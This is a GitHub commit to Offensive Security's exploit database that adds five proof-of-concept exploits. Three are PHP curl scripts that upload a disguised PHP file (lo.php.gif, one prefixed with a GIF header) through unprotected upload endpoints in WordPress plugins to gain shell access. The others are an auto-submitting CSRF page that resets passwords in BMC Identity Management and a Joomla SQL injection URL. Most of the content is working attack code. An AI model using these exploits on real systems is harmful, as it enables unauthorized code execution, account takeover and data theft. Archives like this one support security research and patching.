Skip to content

Commit 441db36

Browse files
author
Offensive Security
committed
DB: 2015-06-26
5 new exploits
1 parent 611a357 commit 441db36

6 files changed

Lines changed: 105 additions & 0 deletions

File tree

files.csv

Lines changed: 5 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -33723,3 +33723,8 @@ id,file,description,date,author,platform,type,port
3372333723
37367,platforms/windows/local/37367.rb,"Windows ClientCopyImage Win32k Exploit",2015-06-24,metasploit,windows,local,0
3372433724
37368,platforms/multiple/remote/37368.rb,"Adobe Flash Player ShaderJob Buffer Overflow",2015-06-24,metasploit,multiple,remote,0
3372533725
37369,platforms/php/webapps/37369.txt,"Vesta Control Panel 0.9.8 - OS Command Injection",2015-06-24,"High-Tech Bridge SA",php,webapps,0
33726+
37370,platforms/php/webapps/37370.php,"WordPress FCChat Widget Plugin 2.2.x 'Upload.php' Arbitrary File Upload Vulnerability",2012-06-07,"Sammy FORGIT",php,webapps,0
33727+
37371,platforms/php/webapps/37371.php,"WordPress Picturesurf Gallery Plugin 'upload.php' Arbitrary File Upload Vulnerability",2012-06-03,"Sammy FORGIT",php,webapps,0
33728+
37372,platforms/java/webapps/37372.html,"BMC Identity Management Cross Site Request Forgery Vulnerability",2012-06-11,"Travis Lee",java,webapps,0
33729+
37373,platforms/php/webapps/37373.php,"WordPress Contus Video Gallery Plugin 'upload1.php' Arbitrary File Upload Vulnerability",2012-06-12,"Sammy FORGIT",php,webapps,0
33730+
37374,platforms/php/webapps/37374.txt,"Joomla! Alphacontent Component 'limitstart' Parameter SQL Injection Vulnerability",2012-06-10,xDarkSton3x,php,webapps,0

platforms/java/webapps/37372.html

Lines changed: 7 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,7 @@
1+
source: http://www.securityfocus.com/bid/53924/info
2+
3+
Identity Management is prone to a cross-site request-forgery vulnerability because the application fails to properly validate HTTP requests.
4+
5+
Exploiting this issue may allow a remote attacker to perform certain actions in the context of an authorized user's session and gain unauthorized access to the affected application; other attacks are also possible.
6+
7+
<html><head><title>BMC IDM Change PW CSRF PoC</title></head> <body onload="document.getElementById('CSRF').submit()"> <form action="https://xxx.xxx.xxx.xxx/idm/password-manager/changePasswords.do"; method="post" id="CSRF"> <input type="hidden" name="colChkbx_Tab1" value="CN=Test User,OU=User Accounts,DC=corporate,DC=business,DC=com corporate Win2000" /> <input type="hidden" name="password" value="Abc123!" /> <input type="hidden" name="passwordAgain" value="Abc123!" /> <input type="hidden" name="selAccts" value="CN=user Name,OU=User Accounts,DC=corporate,DC=business,DC=com corporate Win2000" /> </form></body></html>

platforms/php/webapps/37370.php

Lines changed: 31 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,31 @@
1+
source: http://www.securityfocus.com/bid/53855/info
2+
3+
WordPress FCChat Widget plugin is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
4+
5+
An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.
6+
7+
WordPress FCChat Widget plugin 2.2.12.2 through versions 2.2.13.1 are vulnerable.
8+
9+
<?php
10+
11+
$uploadfile="lo.php.gif";
12+
$ch =
13+
curl_init("http://www.exemple.com/wordpress/wp-content/plugins/fcchat/html/Upload.php?id=1");
14+
curl_setopt($ch, CURLOPT_POST, true);
15+
curl_setopt($ch, CURLOPT_POSTFIELDS,
16+
array('Filedata'=>"@$uploadfile",
17+
'Submit'=>'submit'));
18+
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
19+
$postResult = curl_exec($ch);
20+
curl_close($ch);
21+
print "$postResult";
22+
23+
?>
24+
25+
Shell Access :
26+
http://www.exemple.com/wordpress/wp-content/plugins/fcchat/html/images/1_lo.php.gif
27+
28+
lo.php.gif
29+
<?php
30+
phpinfo();
31+
?>

platforms/php/webapps/37371.php

Lines changed: 33 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,33 @@
1+
source: http://www.securityfocus.com/bid/53894/info
2+
3+
Picturesurf Gallery plugin is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
4+
5+
An attacker can exploit this issue to upload arbitrary PHP code and run it in the context of the Web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
6+
7+
Picturesurf Gallery 1.2 is vulnerable; other versions may also be affected.
8+
9+
PostShell.php
10+
<?php
11+
12+
$uploadfile="lo.php.gif";
13+
$ch =
14+
curl_init("http://www.exemple.com/wordpress/wp-content/plugins/picturesurf-gallery/upload.php");
15+
curl_setopt($ch, CURLOPT_POST, true);
16+
curl_setopt($ch, CURLOPT_POSTFIELDS,
17+
array('Filedata'=>"@$uploadfile",
18+
'is_simple'=>'is_simple'));
19+
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
20+
$postResult = curl_exec($ch);
21+
curl_close($ch);
22+
print "$postResult";
23+
24+
?>
25+
26+
Shell Access :
27+
http://www.exemple.com/wordpress/wp-content/plugins/picturesurf-gallery/data/upload/lo.php.gif
28+
29+
lo.php.gif
30+
GIF89a???????????!??????,???????D?;?
31+
<?php
32+
phpinfo();
33+
?>

platforms/php/webapps/37373.php

Lines changed: 22 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,22 @@
1+
source: http://www.securityfocus.com/bid/53931/info
2+
3+
WordPress Contus Video Gallery is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
4+
5+
An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.
6+
7+
WordPress Contus Video Gallery 1.3 is vulnerable; other versions may also be affected.
8+
9+
<?php
10+
11+
$uploadfile="lo.php.jpg";
12+
$ch = curl_init("http://www.example.com/wordpress/wp-content/plugins/contus-video-galleryversion-10/upload1.php");
13+
curl_setopt($ch, CURLOPT_POST, true);
14+
curl_setopt($ch, CURLOPT_POSTFIELDS,
15+
array('myfile'=>"@$uploadfile",
16+
'mode'=>'image'));
17+
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
18+
$postResult = curl_exec($ch);
19+
curl_close($ch);
20+
print "$postResult";
21+
22+
?>

platforms/php/webapps/37374.txt

Lines changed: 7 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,7 @@
1+
source: http://www.securityfocus.com/bid/53942/info
2+
3+
The Alphacontent component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
4+
5+
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
6+
7+
http://www.example.com/index.php?option=com_alphacontent&section=weblinks&Itemid=1&lang=de&limitstart=[sqli]

0 commit comments

Comments
 (0)